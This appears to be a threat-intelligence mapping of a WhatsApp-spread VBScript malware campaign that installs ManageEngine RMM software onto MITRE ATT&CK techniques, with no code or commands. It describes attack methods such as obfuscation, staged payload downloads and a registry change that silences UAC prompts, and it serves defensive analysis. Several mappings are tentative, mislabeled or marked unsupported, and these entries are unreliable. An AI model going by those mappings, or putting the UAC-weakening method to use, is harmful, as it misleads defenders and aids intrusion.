A VBScript campaign distributed through WhatsApp deploying RMM software

MITRE Techniques

• [T1204.002 ] User Execution: Malicious File – The user had to open the attachment in WhatsApp Desktop or WhatsApp Web for the infection to begin, using deceptive file names like “Financial Reports.vbs” and “Debt confirmation.vbs” (‘When the user first clicks the attachment…it is downloaded to their machine’ and ‘deceptive file names designed to appear as legitimate business and financial documents’).
• [T1059.005 ] Command and Scripting Interpreter: Visual Basic – The campaign relied on VBScript/VBE files as the primary malware format and execution method (‘the script creates a working directory…downloads two additional VBScript payloads’ and ‘the malware was being distributed…malicious VBScript files’).
• [T1105 ] Ingress Tool Transfer – Stage 1 and Stage 2 scripts downloaded additional payloads and ZIP content from attacker-controlled infrastructure (‘downloads two additional VBScript payloads from a remote infrastructure’ and ‘downloads a ZIP archive, extracts its contents’).
• [T1027 ] Obfuscated Files or Information – The scripts used string concatenation, encoded VBScript, randomized variable names, junk content, and heavy obfuscation to hide functionality (‘string concatenation, encoded VBScript, randomized variable names, and large amounts of junk content’).
• [T1218.011 ] System Binary Proxy Execution: Rundll32/Windows Script Host? – The malware used Windows Script Host to execute script files (‘the VBScript is launched through Windows Script Host (WScript.exe)’).
• [T1036 ] Masquerading – The files and comments impersonated legitimate business documents and Windows Update components (‘appears as legitimate business and financial documents’ and ‘mimic legitimate Microsoft Windows Update components’).
• [T1112 ] Modify Registry – One Stage 2 script repeatedly attempted to change the ConsentPromptBehaviorAdmin registry value to weaken UAC prompts (‘attempting to modify the ConsentPromptBehaviorAdmin registry value’).
• [T1548.002 ] Abuse Elevation Control Mechanism: Bypass User Account Control – The script used runas and registry changes in an attempt to enable administrative actions without consent prompts (‘ShellExecute method with the runas verb’ and ‘set…value to 0, thus enabling administrative actions without displaying a consent prompt’).
• [T1574.002 ] Hijack Execution Flow: DLL Search Order Hijacking? – Not clearly supported.
• [T1053 ] Scheduled Task/Job – Not mentioned.
• [T1113 ] Screen Capture – Not mentioned.
• [T1219 ] Remote Access Software – The final stage installed the legitimate ManageEngine Endpoint Central RMM agent to provide remote access and administration (‘installation of remote monitoring and management software’ and ‘enabling remote access to the victim’s system’).
• [T1505.001 ] Server Software Component: SQL Stored Procedures? – Not mentioned.
• [T1110 ] Brute Force – Not mentioned.
• [T1555 ] Credentials from Password Stores – Compromised WhatsApp accounts were used, but no direct credential theft method was described (‘the threat actor had gained access to several WhatsApp accounts’).
• [T1078 ] Valid Accounts – The campaign used compromised WhatsApp accounts to send malicious attachments to contacts (‘had gained access to several WhatsApp accounts and used them to distribute the malicious VBScript files’).